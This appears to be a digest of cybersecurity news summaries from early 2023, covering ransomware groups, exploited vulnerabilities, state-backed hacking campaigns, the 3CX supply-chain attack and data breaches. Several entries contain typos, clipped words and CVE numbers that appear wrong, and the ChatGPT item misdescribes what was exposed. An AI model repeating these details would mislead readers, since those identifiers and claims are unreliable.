    Nexx Bugs Allow to Open Garage Doors, and Take Control of Alarms and Plugs

    Researchers have found multiple vulnerabilities in Nexx smart devices, which can be exploited to control garage doors, disable home alarms, and control smart plugs. Five security issues ranging in severity have been disclosed publicly, the vendor has yet to acknowledge and fix them. Most concerning is the use of universal credentials that are hardcoded into the devices firmware. Researchers say these credentials can easily be obtained via the client communication with Nexx’s API. The vulnerability can also be exploited to identify Nexx users, allowing an attacker to collect email addresses, device IDs, and first names.

    Police Seize Hacker Bazaar Genesis Market

    U.S. authorities say Genesis Market since 2018 has offered access to more than 1.5 million compromised computers around the world containing more than 80 million account credentials. For sale on the site weren't just username and password combinations but device fingerprints including browser cookies and system information that allowed hackers to bypass security measures such as multifactor authentication.

    ALPHV Ransomware Exploits Veritas Backup Exec Bugs for Initial Access

    Researchers observed an affiliate of ALPHV exploiting three vulnerabilities in Veritas Backup products to gain initial access to target networks. The ALPHV ransomware group was founded in December 2021 and is believed to be run by former members of the Darkside and Blackmatter ransomware groups who shut down their operations to avoid law enforcement pressure.

    New Rorschach Ransomware Is the Fastest Encryptor Seen So Far

    Security researchers at Check Point uncovered a new ransomware strain, dubbed Rorschach, which features encryption speeds never seen before. “The encryption scheme blends the curve25519 and eSTREAM cipher hc-128 algorithms and follows the intermittent encryption trend, meaning that it encrypts the files only partially, lending it increased processing speed.

    HP to Patch Critical Bug in LaserJet Printers Within 90 Days

    In a security bulletin this week, HP announced that it would take up to 90 to fix a critical vulnerability impacting several of its business-grade printers with IPsec enabled and running FutureSmart firmware version 5.6. Nearly 50 HP Enterprise LaserJet and HP LaserJet managed printer models are vulnerable to the flaw. According to HP, successful exploitation of CVE-2023-1707 could lead to information disclosure, allowing threat actors to access sensitive information transmitted between the vulnerable HP Printers and other devices on the network.

    Fake Data Theft Proof Leads to Royal Ransomware Outbreak

    The Royal ransomware group - another offshoot of the disbanded Conti group - appears to have targeted over 1,000 organizations with a social engineering attack designed to trick victims into trusting the attackers. The firm last month identified a spam campaign that appears to trace to Royal and that layers on the deception, first by falsely notifying victims that a ransomware group has attacked them and then by pressuring them into opening a file that purportedly lists what was stolen but is a malware loader. The scheme may have even concocted a fake ransomware group: the Midnight Group. The group's claims to have infected victims with ransomware appeared fake. Victims of this fraud campaign receive emails claiming the Midnight Group was behind the original ransomware attack and their data will be posted on the dark web if they do not pay. Midnight is itself a fake scheme likely cooked up by Royal. This assessment is based in part on the attack telemetry and malware used by the attackers and the emails received by victims.

    CISA Warns of Zimbra Bug Exploited in Attacks Against NATO Countries

    CISA is warning organizations to patch against an actively exploited vulnerability in Zimbra, a cloud-based collaboration suite. Tracked as CVE-2022-2726, the bug is related to a cross-site scripting flaw which can exploited by unauthenticated actors to execute arbitrary web script or HTML via specially crafted requests. According to cybersecurity firm ProofPoint CVE-2022-2726 was leveraged by a Russian hacking group, Winter Vivern or TA473, in attacks against several NATO-aligned governments’ webmail portals to access the emails of officials, governments, military personnel and diplomats.

    Arid Viper Hacking Group Using Upgraded Malware in Middle East Cyber Attacks

    Researchers at Symantec recently disclosed details of a campaign that has been targeting Palestinian entities with a variety of malware toolkits since September 2022. The campaign has been attributed to Arid Viper ( aka Moniker Mantis, APT-C-23, Desert Falcon) which is known for launching attacks against entities in Palestine and the Middle East, dating back as early as 2014. Based on attacks observed by this group, Mantis relies custom malware tools including ViperRat, FrozenCell (VolatileVenom), Adird Gopher, and Micropsia to target users of Windows, Android, and iOS platforms.

    WinRAR SFX Archives Can Run Powershell Without Being Detected

    Cybercriminals are incorporating harmful features into self-extracting winRAR archives, which contain benign files as a disguise, enabling them to implant backdoors undetected by security measures on target systems. Self-extracting archives are made with compression programs such as WinRAR or 7-Zip, and they function like executables that include archived data with a built-in decompression stub. These archives can be safeguarded with passwords to restrict unauthorized access.

    IRS-authorized eFile[.]com Tax Return Software Caught Serving JS Malware

    eFile is a service provider authorized by the IRS to assist in submitting tax returns. Security researchers claim malicious JavaScript code has been pushed by the website for the last couple of weeks. The impacted website is eFile[.]com only, not the IRS’s e-file infrastructure. The malware in question is popper[.]js, which attempts to load JavaScript returned by infoamanewonliag[.]online. This malware comes at an impactful time as U.S. taxpayers are trying to wrap up their IRS tax returns before the April 18th deadline. The malicious JavaScript uses Math[.]random() which prevents caching and will load a fresh copy of the malware every time eFile is visited. BleepingComputer confirmed that the malicious JavaScript file was being loaded on almost every page of eFile up until at least April 1st.

    Fake Ransomware Gang Targets U.S. Orgs With Empty Data Leak Threats

    Fake extortionists are attempting to take advantage of data breaches and ransomware incidents to threaten US companies. They, are demanding payment in exchange for not publishing or selling data they claim to have stolen. Additionally, the threat actors may threaten to launch DDoS attack if demands, are not made. Since March 16, the group dubbed Midnight has applied email impersonation attacks to pass themselves off as ransomware and data extortion groups. In some instances, they claimed responsibility for the attack and stated they have stolen significant amounts of data.

    New Money Message Ransomware Demands Million Dollar Ransoms

    A new ransomware gang named 'Money Message' has appeared, targeting victims worldwide and demanding million-dollar ransoms not to leak data and release a decryptor. The new ransomware was first reported by a victim on the BleepingComputer forums on March 28, 2023, with Zscaler's ThreatLabz soon after sharing information on Twitter. Currently, the threat actor lists two victims on its extortion site, one of which is an Asian airline with annual revenue close to $1 billion.

    Hackers Exploit Bug in Elementor Pro WordPress Plugin With 11M Installs

    Last week, NinTechNet security researcher Jerome Bruandet shared a technical write up regarding an actively exploited high severity vulnerability in Elementor Pro, a WordPress builder plugin that allows users without any coding experience to easily build professional looking sites. According to Bruandet, the vulnerability relates to an improper validation/access control in the plugin’s WooCommerce module and can be abused to modify WordPress options in the database without authentication.

    North Korean Lazarus Group Linked to 3CX Supply Chain Hack

    Security researchers have uncovered more evidence that the North Korean Lazarus group is responsible for the software supply chain attack on 3CX, a voice and video calling desktop client used by major multinational companies. Attribution to the Lazarus group became evident during an analysis of the tools used in the attack, said cybersecurity firm Volexity, Sophos, Crowdstrike and others. "The shellcode sequence appears to have been only used in the ICONIC loader and the APPLEJEUS malware, which is known to be linked to Lazarus," Volexity said. "The code in this incident is a byte-to-byte match to those previous samples," Sophos said. Researchers at CrowdStrike also analyzed and reverse-engineered the code and identified the threat actor as Labyrinth Chollima, another name for the Lazarus cyberespionage group. "Once active, the HTTPS beacon structure and encryption key match those observed by CrowdStrike in a March 7, 2023, campaign attributed with high confidence to DPRK-nexus threat actor LABYRINTH CHOLLIMA.

    Western Digital Discloses Network Breach, My Cloud Service Down

    Western Digital announced today that its network has been breached and an unauthorized party gained access to multiple company systems. The California-based computer drive maker and provider of data storage services says in a press release that the network security incident was identified last Sunday, on March 26. An investigation is in its early stages and the company is coordinating efforts with law enforcement authorities.

    Bing Search Results Hijacked via Misconfigured Microsoft App

    Threat actors have hijacked Bing search results by exploiting a misconfigured Microsoft app. The vulnerability allowed the attackers to manipulate search results and redirect users to malicious websites, putting them at risk of phishing attacks and malware downloads. Wiz researchers discovered the vulnerability, dubbed BingBang, and informed Microsoft on January 31, 2023.

    Microsoft OneNote Will Block 120 Dangerous File Extensions

    On March 10, Microsoft announced that it would be bringing forth enhanced security measures to protect against known phishing file types including OneNote files, which have become a popular distribution method ever since the company blocked Word and Excel macros by default and patched a MoTW bypass zero-day exploited to drop malware via ISO and ZIP files. Yesterday, the tech giant published an update, providing more details regarding what specific file extensions will be blocked when the improvements are rolled out. In total, Microsoft will be blocking 120 extensions deemed dangerous.

    CISA Orders Agencies to Patch Bugs Exploited to Drop Spyware

    Yesterday, CISA added several security vulnerabilities to its catalog of known exploited vulnerabilities. According to a new blog post by Google’s Threat Analysis Group, the flaws were leveraged as part of several exploit chains in two separate campaigns, ultimately leading to the installment of spyware on targeted devices. The first of the the campaigns was first spotted in November 2022, where actors used the exploit chains to compromise iOS and Android devices. The second campaign took place one month later, abusing several 0-days and n-days exploits to target Samsung Android phones running up-to-date Samsung Internet Browser versions.

    Leaks Reveal Moscow Source for Hacking, Disinformation Tools

    The leaked files, dating from 2016 to 2021, include emails, internal documents, project plans, budgets, and contracts. One of Vulkan's clients is the hacking group Sandworm, a project dubbed Amezit or Amesit is designed to help the Russian military automate large-scale disinformation operations across social media and other channels such as email and SMS texts using fake accounts populated by avatars that sport stolen photographs and extensive backstories. Another, called Krystal-2B, includes tools for training hacking teams to attack railways, pipelines, and other operational technology environments.

    TLP:GREEN - Hackers Compromise 3CX Desktop App in a Supply Chain Attack

    An ongoing supply chain attack is reportedly using a trojanized version of the 3CX VOIP desktop client, which is digitally signed, to target the customers of the company. 3CX is a software development company that provides VOIP IPBX services. Its 3CX Phone System is popular among businesses, with over 12 million daily users and 600,000+ companies worldwide using the software. Attackers are targeting both WindowsOS and MacOS users.

    New AlienFox Toolkit Steals Credentials for 18 Cloud Services

    Researchers at SentinelOne have uncovered a new modular toolkit dubbed AlienFox which enables actors to scan misconfigured servers and steal authentication secrets and credentials for cloud-based email services. The toolkit is currently being sold to cybercriminals via a private Telegram channel and is capable of targeting online hosting frameworks including Laravel, Drupal, Joomla, Magento, Opencart, Prestashop, and WordPress hosted on misconfigured servers for secrets. According to researchers, they identified three different versions of AlienFox, indicating that the authors behind the toolkit are actively developing and improving the tool.

    QNAP Warns Customers to Patch Linux Sudo Flaw in NAS Devices

    QNAP recently published security updates to address a high-severity Sudo privilege escalation vulnerability in their Linux-powered network-attached storage devices. Tracked as CVE-2023-2280, the flaw was discovered by Synacktiv security researchers, who describe the vulnerability as a “sudoers policy bypass in Sudo version 1.9.12p1 when using sudoedit.” Successful exploitation of this flaw could enable attackers to escalate privileges on impacted devices by editing unauthorized files after appending arbitrary entries to the list of files to process.

    FDA Protects Medical Devices Against Cyber-Threats With New Measures

    The US Food and Drug Administration (FDA) staff has published new guidelines to strengthen the cybersecurity levels of internet-connected products used by hospitals and healthcare providers. According to a guidance document published earlier today, applicants seeking approval for new medical devices must submit a plan designed to “monitor, identify and address” possible cybersecurity issues associated with them.

    CX Desktop Application Supply Chain Attack - Worldwide

    On Mar. 29 open sources reported that a version of the 3CX Voice Over Internet Protocol (VOIP) desktop client application is being used to target the company’s customers in an ongoing supply chain attack. 3XC’s VOIP software is used by more than 600,000 companies worldwide with over 12 million users.

    Phishing Campaign Tied to Russia-Aligned Cyberespionage

    Recent targets of the group have included U.S. elected officials and staffers, multiple European governments - including Ukrainian and Italian foreign ministry officials - plus Indian government officials and private telecommunications firms that support Ukraine, researchers at security firms Proofpoint and SentinelOne report. The hackers exploit hosted Zimbra portals as part of island hopping attacks, seeking to move through a chain of victims to eventually access their desired target, which might be government systems or energy systems they would try to disrupt.

    Google Finds More Android, iOS Zero-Days Used to Install Spyware

    Google's Threat Analysis Group (TAG) discovered several exploit chains using Android, iOS, and Chrome zero-day and n-day vulnerabilities to install commercial spyware and malicious apps on targets' devices. The attackers targeted iOS and Android users with separate exploit chains as part of a first campaign spotted in November 2022. They used text messages pushing bit.ly shortened links to redirect the victims to legitimate shipment websites from Italy, Malaysia, and Kazakhstan after first sending them to pages triggering exploits abusing a WebKit remote code execution zero-day (CVE-2022-42856) and a sandbox escape (CVE-2021-30900) bug. On compromised devices, the threat actors dropped a payload allowing them to track the victims' location and install .IPA files. In this campaign, an Android exploit chain was also used to attack devices featuring ARM GPUs with a Chrome GPU sandbox bypass zero-day (CVE-2022-4135), an ARM privilege escalation bug (CVE-2022-38181), and a Chrome type confusion bug (CVE-2022-3723) with an unknown payload.

    Newly Exposed APT43 Hacking Group Targeting US Orgs Since 2018

    A new North Korean hacking group has been revealed to be targeting government organizations, academics, and think tanks in the United States, Europe, Japan, and South Korea for the past five years. The moderately-sophisticated threat actor is tracked as 'APT43' and is seen engaging in espionage and financially-motivated cybercrime operations that help fund its activities. Mandiant analysts who disclosed the activities of APT43 for the first time assess with high confidence that the threat actors are state-sponsored, aligning their operational goals with the North Korean government's geopolitical aims. The researchers have been tracking APT43 since late 2018 but have disclosed more specific details about the threat group only now.

    Crown Resorts Confirms Ransom Demand After GoAnywhere Breach

    Crown Resorts, which operates hotels and casinos in Australia, confirmed a data breach. The resort accrues an annual revenue that surpasses 8 billion, and operates in Melbourne, Perth, Sydney, Macau, and London. The attackers employed the GoAnywhere file transfer software to access sensitive data, including financial and personal information. They subsequently demanded a ransom payment to prevent them from disclosing the stolen data.

    Telecom Giant Lumen Suffered a Ransomware Attack and Disclosed a Second Incident

    In a filing to the Securities and Exchange Commission, on March 27, 2023, Lumen announced two cybersecurity incidents. One of the incidents is a ransomware attack that impacted a limited number of its servers that support a segmented hosting service. The company did not provide details about the family of ransomware that infected its systems, it only admitted that the incident “is currently degrading the operations of a small number of the Company’s enterprise customers.

    Microsoft Shares Guidance for Investigating Attacks Exploiting CVE-2023-23397

    This week, Microsoft published investigation guidance to help Outlook customers search for attacks exploiting a recently patched vulnerability tracked as CVE-2023-23397. The flaw in Microsoft Outlook, allows for spoofing attacks that can lead to authentication bypass. Using the vulnerability, a remote attacker can gain access to a user’s Net-NTLMv2 hash by sending a specially crafted email to an impacted system.

    WiFi Protocol Flaw Allows Attackers to Hijack Network Traffic

    Cybersecurity researchers have discovered a fundamental security flaw in the design of the IEEE 802.11 WiFi protocol standard, allowing attackers to trick access points into leaking network frames in plaintext form” (Bleeping Computer, 2023). WiFi frames are data containers that contain a header, data payload, and trailer. These frames include source and destination MAC addresses, control information, and management data.

    Nigerian Sentenced to 4 Years for Scamming US Citizens

    A U.S. federal judge sentenced a Nigerian national to four years in prison for running several cyber-enabled schemes aimed at defrauding U.S. citizens out of more than $1 million. The men were arrested four years ago and extradited to Arizona in 2022 from Malaysia and the United Kingdom. Solomon Ekunke Okpe, 31, of Lagos and his co-conspirator, Johnson Uke Obogo, orchestrated business email compromise phishing attacks and a variety of schemes including work-from-home offers, check cashing, romance and credit card scams that targeted individuals, banks and other businesses, the U.S. Department of Justice said Monday.

    Latitude Financial Data Breach Now Impacts 14 Million Customers

    Australian loan giant Latitude Financial Services (Latitude) is warning customers that its data breach has worsened. They've released an updated data breach notification warning customers that those impacted have increased from 328,000 to 14 million. "As our forensic review continues to progress, we have identified that approximately 7.9 million Australian and New Zealand driver's license numbers were stolen, of which approximately 3.2 million, or 40%, were provided to us in the last ten years. Approximately 6.1 million records dating back to 2005 were also stolen, of which approximately 5.7 million, or 94%, were provided before 2013.

    New IcedID Variants Shift From Bank Fraud to Malware Delivery

    Researchers at Proofpoint reported the discovery of new variants of IcedID malware that do not include the usual functionality for online banking fraud. Instead, the malware installs further malware on compromised systems, with a particular emphasis on ransomware. According to Proofpoint, two new variants of the IcedID loader, called Lite and Forked, were identified. Lite was observed in February 2023, while Forked was seen in February 2023. Both variants deliver the IcedID bot but with a more limited set of features. By removing unnecessary functions from the IcedID malware used in various campaigns, the threat actors can make it more streamlined and harder to detect. This approach could help attackers evade detection by security software.

    New MacStealer macOS Malware Steals iCloud Keychain Data and Passwords

    Security researchers at Uptycs recently uncovered a new information stealing malware, designed to target macOS systems, primarily those running macOS versions Catalina and subsequent versions running on M1 and M2 CPU chips. Dubbed, MacStealer, the malware is capable of stealing documents, cookies from the victim’s browser, login information, and much more. MacStealer is being distributed as a malware-as-a-service (MaaS), where the developer is currently selling premade builds for a $100. According to the developer, MacStealer is still in the early development phase as it offers no panels or builders. However the developer is planning on updating the malware to incorporate more features including the ability to capture data from Apple’s Safari Browser and the Notes application.

    Apple Fixes Recently Disclosed Webkit Zero-Day on Older Iphones

    Apple recently published security updates to backport an actively exploited zero-day bug that was disclosed earlier in February, 2023. Tracked as CVE-2023-23529, the zero-day is related to a WebKit type confusion bug that could enable attackers to trigger OS crashes and gain code execution on compromised iOS and iPadOS devices after tricking victims into opening malicious web pages.

    OPENAI: A Redis Bug Caused a Recent ChatGPT Data Exposure Incident

    OpenAI revealed that a Redis bug caused the recent disclosure of user personal information and chat titles in the ChatGPT chatbot service. The bug enabled unauthorized access to a Redis instance that contained metadata linked to ChatGPT's training data. On March 20, 2023, several ChatGPT users started reporting seeing conversation histories of other users appearing in their accounts. The same day, the history function showed the error message “Unable to load history,” and the chatbot service was temporarily interrupted.

    New Dark Power Ransomware Claims 10 Victims in Its First Month

    A new ransomware operation named 'Dark Power' has appeared, and it has already listed its first victims on a dark web data leak site, threatening to publish the data if a ransom is not paid. The ransomware gang's encryptor has a compilation date of January 29, 2023, when the attacks started. Furthermore, the operation has not been promoted on any hacker forums or dark web spaces yet; hence it's likely a private project. According to Trellix, which analyzed Dark Power, this is an opportunistic ransomware operation that targets organizations worldwide, asking for relatively small ransom payments of $10,000.

    3-Year JS Injection Campaign Targets 51,000 Websites

    A widespread ongoing malicious JavaScript injection campaign first detected in 2020 has targeted over 51,000 websites, redirecting victims to malicious content such as adware and scam pages. Unit 42 researchers have been tracking this activity through 2022 and it continues to infect websites in 2023. They suspect the campaign "has impacted a large number of people, since hundreds of these infected websites were ranked in Tranco's top million websites." Victims are typically redirected to an adware or a scam page, mostly masquerading as a well-known video-sharing platform or deceptive content that tricks victims into allowing an attacker-controlled website to send browser notifications.

    IRS Phishing Emails Used to Distribute Emotet

    The US Internal Revenue Service issued a warning to taxpayers about a new phishing campaign that employs Emotet malware to steal personal information. The emails, which appear to come from the IRS, include a malicious attachment or link that, if clicked, will download the Emotet malware on a victim's machine.

    GitHub Swiftly Replaces Exposed RSA SSH Key to Protect Git Operations

    Cloud-based repository hosting service GitHub said it took the step of replacing its RSA SSH host key used to secure Git operations "out of an abundance of caution" after it was briefly exposed in a public repository. The activity, which was carried out at 05:00 UTC on March 24, 2023, is said to have been undertaken as a measure to prevent any bad actor from impersonating the service or eavesdropping on users' operations over SSH.

    WordPress Force Patching WooCommerce Plugin With 500K Installs

    Content Management Platform WordPress has force installed security updates on hundreds of thousands of websites running WooCommerce, a popular payment plugin for online stores. The security update addresses a critical flaw (CVSS 9.8) that allows unauthenticated attackers to gain admin access to vulnerable stores.

    US Officials Urged to Examine Chinese Risk to Electric Grid

    Utility companies increasingly refrain from purchasing large power transformers from China given greater awareness of the security risks, a U.S. Department of Energy official told a Senate panel. Puesh Kumar said Thursday the U.S. government is analyzing the prevalence of Chinese-made components in the electric grid but wouldn't indicate when he expects the work to the done, frustrating senators on both sides of the aisle. The head of the department's Office of Cybersecurity, Energy Security, and Emergency Response testified before the Senate Energy and Natural Resources Committee.

    Exploit Released for Veeam Bug Allowing Cleartext Credential Theft

    Horizon3's Attack Team published a technical root cause analysis for this high-severity vulnerability, which includes a detailed proof-of-concept (PoC). Cross-platform exploit code is now available for a high-severity Backup Service vulnerability impacting Veeam's Backup & Replication (VBR) software. The flaw (CVE-2023-27532) affects all VBR versions and can be exploited by unauthenticated attackers to breach backup infrastructure after stealing cleartext credentials and gaining remote code execution as SYSTEM.

    Operation Soft Cell: Chinese Hackers Breach Middle East Telecom Providers

    Researchers at SentinelOne and QGroup have uncovered a new campaign targeting telecommunication providers in the Middle East since the first quarter of 2023. The attacks have been attributed to a Chinese cyber espionage actor which researchers associate with a long running campaign dubbed “Operation Soft Cell, that has been under the radar since 2012. Given the toolset deployed, it is likely that this cyberespionage actor is the nexus of Gallium and APT41 which have a history of targeting telecommunication entities across the globe.

    German and South Korean Agencies Warn of Kimsuky's Expanding Cyber Attack Tactics

    German and South Korean government agencies have warned about cyber attacks mounted by a threat actor tracked as Kimsuky using rogue browser extensions to steal users' Gmail inboxes. The joint advisory comes from Germany's domestic intelligence apparatus, the Federal Office for the Protection of the Constitution (BfV), and South Korea's National Intelligence Service of the Republic of Korea (NIS). The intrusions are designed to strike ‘experts on the Korean Peninsula and North Korea issues’ through spear-phishing campaigns, the agencies noted.

    Dole Discloses Employee Data Breach after Ransomware Attack

    Fresh produce giant Dole Food Company has confirmed threat actors behind a February ransomware attack have accessed the information of an undisclosed number of employees. Dole employs around 38,000 people worldwide, providing fresh fruits and vegetables to customers in more than 75 countries. The company revealed that last month's cyberattack directly impacted its employees' information in the annual report filed with the U.S. Securities and Exchange Commission (SEC) on Wednesday.

    US FTC Seeks Information on Cloud Provider Cybersecurity

    The global shift into cloud computing may come under increased scrutiny by U.S. regulators following an announcement by the U.S. Federal Trade Commission that it is studying cloud industry market dynamics, including potential security risks. The oversight agency issued a request for information asking whether cloud providers use contractual or technological measures to entrench customers. It also asks for public response by May 22 to questions such as what representations cloud providers make about data security and contractual divisions of responsibility for the security of consumer personal information stored in the cloud.

    Over 2400 Fake Pages Found Targeting Job Seekers in Middle East, Africa

    Group-IB security researchers have discovered over 2400 scam pages that target Arabic-speaking job seekers in 13 countries between January 2022 and January 2023. Cybercriminals have created fake job listings and websites to target job seekers and steal personal information. Firms based in Egypt, Saudi Arabia, and Algeria are the most impersonated by scammers. The new scam campaign targets over 40 well-known brands from 13 countries in the MEA region, with the majority of scam pages impersonating companies in the logistics sector (64%), followed by the food and beverage sector (20%), and the petroleum industry (12%). The scheme involves an initial phishing attempt that guides victims to fake web pages with a similar job vacancy description.

    Google Suspends Chinese App Following Malware Discovery

    oogle suspended popular budget e-commerce application Pinduoduo from the Play Store after detecting malware on versions of the Chinese app downloadable from other online stores. In a statement on Tuesday, Google said it took action to block the installation of Pinduoduo on Android devices and that it would scan smartphones for malicious versions through its Google Play Protect service. Google's action hasn't stopped Android app stores run by Huawei, Xiaomi and others from offering the app, reported the South China Morning Post. Google Play is blocked in China.

    New 'Bad Magic' Cyber Threat Disrupt Ukraine's Key Sectors Amid War

    Cybersecurity firm Kaspersky has uncovered a new campaign dubbed Bad Magic which is targeting government, agriculture, and transportation organizations in Donetsk, Lugansk, and Crimea. First spotted in October 2022, the attack chain starts off with a booby-trapped URL pointing to a ZIP archive hosted on a malicious web server. When launched, the archive contains a decoy document as well as a malicious LNK file that is responsible for deploying a backdoor dubbed PowerMagic.

    BreachForums Administrator Baphomet Shuts Down Infamous Hacking Forum

    On March 15, 2023 law enforcement arrested 21-year old, Conor Brian Fitzpatrick (aka “Pompompurin”), the administrator of “Breach Forums,” an infamous underground forum that has been known for hosting stolen databases belonging to several companies often including sensitive information. Fitzpatrick was later released a day later on a 300,000 bond signed by his parents and is scheduled to appear for a hearing on March 24, 2023 before the District Court for the Eastern District of Virginia. Following the the arrest of Fitzpatrick, Baphomet, the current administrator posted an update on March 21, 2023 stating that they have decided to take down the forum, emphasizing ‘this is not the end.” This take down is suspected to be prompted by suspicions that law enforcement may have obtained access to the site’s configurations, source code, and information about the forum’s users.

    PoC Exploits Released for Netgear Orbi Router Vulnerabilities

    Proof-of-concept exploits for vulnerabilities in Netgear’s Orbi 750 series router and extender satellites have been released, with one flaw a critical severity remote command execution bug. Netgear Orbi is a popular network mesh system for home users, providing strong coverage and high throughput on up to 40 simultaneously connected devices across spaces between 5,000 and 12,500 square feet.

    Mispadu Banking Trojan Targets Latin America: 90,000+ Credentials Stolen

    A banking trojan dubbed Mispadu has been linked to multiple spam campaigns targeting countries like Bolivia, Chile, Mexico, Peru, and Portugal with the goal of stealing credentials and delivering other payloads. The activity, which commenced in August 2022, is currently ongoing, Ocelot Team from Latin American cybersecurity firm Metabase Q said in a report shared with The Hacker News. Mispadu (aka URSA) was first documented by ESET in November 2019, describing its ability to perpetrate monetary and credential theft and act as a backdoor by taking screenshots and capturing keystrokes.

    Ferrari discloses data breach after receiving ransom demand

    talian luxury sports car marker, Ferrari recently disclosed a data breach after attackers gained accessed to some of its IT systems. The company stated that certain data relating to its clients was exposed including names, addresses, email addresses and telephone numbers. Based on investigations conducted so far, Ferrari has yet to find any evidence of payment details/bank account numbers or other sensitive payment information being stolen. Since the company learned of the breach, the company has reached out to relevant authorities to investigate the full scope of the attack.

    Clop Ransomware Claims Saks Fifth Avenue, Retailer Says Mock Data Stolen

    The Clop ransomware gang has claimed responsibility for yet another cyber attack, this time against a luxury retailer Saks Fifth Avenue. The enterprise was founded in 1867 by Andrew Saks and headquartered in New York City City Fifth avenue remains a notable luxury brand retailer serving the U.S., Canada, and parts of the Middle East. The ransomware group claims to have stolen sensitive data during the attack, but Saks has stated that the data is only mock data and no actual customer data was compromised. The retailer has not yet disclosed whether threat actors have apprehended employee or corporate data. Further, details have not been released about any ongoing ransom negotiations.

    Hackers Mostly Targeted Microsoft, Google, Apple Zero-days in 2022

    Hackers continue to target zero-day vulnerabilities in malicious campaigns, with researchers reporting that 55 zero-days were actively exploited in 2022, most targeting Microsoft, Google, and Apple products. Most of these vulnerabilities (53 out of 55) enabled the attacker to either gain elevated privileges or perform remote code execution on vulnerable devices.

    Hitachi Energy Confirms Data Breach After Clop GoAnywhere Attacks

    Hitachi Energy, a subsidiary of the Japanese multinational conglomerate Hitachi, has confirmed a data breach that occurred after being hit by the Clop ransomware group's GoAnywhere attacks. Hitachi is a department of Japanese engineering and technology with an annual revenue of 10 billion. The attack resulted in the theft of sensitive data from several business units in the United States, Thailand, and Japan.

    Alleged BreachForums Owner Pompompurin Arrested on Cybercrime Charges

    U.S. law enforcement arrested on Wednesday a New York man believed to be Pompompurin, the owner of the BreachForums hacking forum. According to court documents, he was charged with one count of conspiracy to solicit individuals to sell unauthorized access devices. During the arrest, the defendant allegedly admitted that his real name was Connor Brian Fitzpatrick and that he was Pompourin, the owner of the Breach Forums cybercrime forum.

    Emotet Malware Now Distributed in Microsoft OneNote Files to Evade Defenses

    The Emotet malware is now distributed using Microsoft OneNote email attachments, aiming to bypass Microsoft security restrictions and infect more targets. Emotet is a notorious malware botnet historically distributed through Microsoft Word and Excel attachments that contain malicious macros. If a user opens the attachment and enables macros, a DLL will be downloaded and executed that installs the Emotet malware on the device. Once loaded, the malware will steal email contacts and email content for use in future spam campaigns. It will also download other payloads that provide initial access to the corporate network. This access is used to conduct cyberattacks against the company, which could include ransomware attacks, data theft, cyber espionage, and extortion.

    Chinese Hackers Targeting Security and Network Appliances

    Chinese threat actors are turning security appliances into penetration pathways, forcing firewall maker Fortinet to again attempt to fend off hackers with a patch. Researchers from Mandiant say suspected Beijing hackers it tracks as UNC3886 has been targeting chip-based firewall and virtualization boxes. The group, it said in a Thursday blog post, exploited a now-patched path transversal zero-day vulnerability tracked as CVE-2022-41328 in the Fortinet operating system in order to gain persistence on FortiGate and FortiManager products. Such penetrations can give hackers years of interrupted access to internal networks. A threat cluster related to UNC3886 also targeted a Fortinet zero-day in a campaign that involved delivery of a custom backdoor "specifically designed to run on FortiGate firewalls.

    Adobe Acrobat Sign Abused to Push Redline Info-Stealing Malware

    Cybercriminals are abusing the Adobe Acrobat Sign service to distribute Redline malware, a powerful information-stealing Trojan. Adobe Acrobat Sign is a cloud-based e-signature service that enables users to create, send, track, and manage electronic signatures. It is a free-to-try service that allows users to sign documents securely and remotely without physical paperwork. Avast researchers observed threat actors sending phishing emails to trick victims into opening malicious PDF documents.

    onti-Based Ransomware ‘Meowcorp’ Gets Free Decryptor

    A decryption tool for a modified version of the Conti ransomware could help hundreds of victims recover their files for free. The utility works with data encrypted with a strain of the ransomware that emerged after the source code for Conti was leaked last year in March [1, 2]. Researchers at cybersecurity company Kaspersky found the leak on a forum where the threat actors released a cache of 258 private keys from a modified version of the Conti ransomware.

    Fortinet Zero-Day Attacks Linked to Suspected Chinese Hackers

    A suspected Chinese hacking group has been linked to a series of attacks on government organizations exploiting a Fortinet zero-day vulnerability (CVE-2022-41328) to deploy malware. The security flaw allowed threat actors to deploy malware payloads by executing unauthorized code or commands on unpatched FortiGate firewall devices, as Fortinet disclosed last week. Further analysis revealed that the attackers could use the malware for cyber-espionage, including data exfiltration, downloading and writing files on compromised devices, or opening remote shells when receiving maliciously crafted ICMP packets.

    Russia May Be Reviving Cyber Ops Ahead of Spring Offensive

    British intelligence reports that since early in January, the Russian military appears to have been "attempting to restart major operations" with a focus on capturing "the remaining Ukrainian-held parts of Donetsk Oblast," a territory the size of Massachusetts located in the eastern part of the country. In new analysis, Microsoft reports Russia in recent months appears to have increased cyberespionage efforts aimed at nations helping with the defense of Ukraine, mostly governments of European nations. Based on a recent flurry of activity by Russia, Microsoft foresees an uptick in ransomware, an emphasis on obtaining initial access to systems, and increased influence operations.

    BianLian Ransomware Gang Shifts Focus to Pure Data Extortion

    The BianLian ransomware group has shifted its focus from encrypting its victims' files to only exfiltrating data found on compromised networks and using them for extortion. This operational development in BianLian was reported by cybersecurity company Redacted, who have seen signs of the threat group attempting to craft their extortion skills and increase the pressure on their victims.

    US Federal Agency Hacked Using Old Telerik Bug to Steal Data

    Last year, a U.S. federal agency's Microsoft Internet Information Services (IIS) web server was hacked by exploiting a critical .NET deserialization vulnerability in the Progress Telerik UI for ASP[.]NET AJAX component. According to a joint advisory issued today by CISA, the FBI, and MS-ISAC, the attackers had access to the server between November 2022 and early January 2023 based on indicators of compromise (IOCs) found on the unnamed federal civilian executive branch (FCEB) agency's network.

    CISA Warns of Adobe ColdFusion Bug Exploited as a Zero-Day

    CISA recently added a critical bug to its catalog of known exploited vulnerabilities. Tracked as CVE-2023-26360, the vulnerability relates to a Improper Access Control issue impacting Adobe ColdFusion versions 2021 (update 5 and earlier versions) and 2018 (Update 15 and earlier versions. Successful exploitation of the flaw could enable actors to elevate their privileges, access sensitive information, and even execute arbitrary code remotely. The vulnerability has been fixed in ColdFusion 2018 version 16 and ColdFusion 2021 version 6. Given the severity of the flaw, CISA is giving federal agencies three weeks, until April 5, to apply the security updates.

    Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and RV325 Routers Vulnerabilities

    Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and RV325 Routers could allow a remote attacker to bypass authentication or execute arbitrary commands on the underlying operating system of an affected device, "A vulnerability in the web-based management interface of Cisco Small Business RV016, RV042, RV042G, and RV082 Routers could allow an unauthenticated, remote attacker to bypass authentication on an affected device.

    Winter Vivern APT hackers Use Fake Antivirus Scans to Install Malware

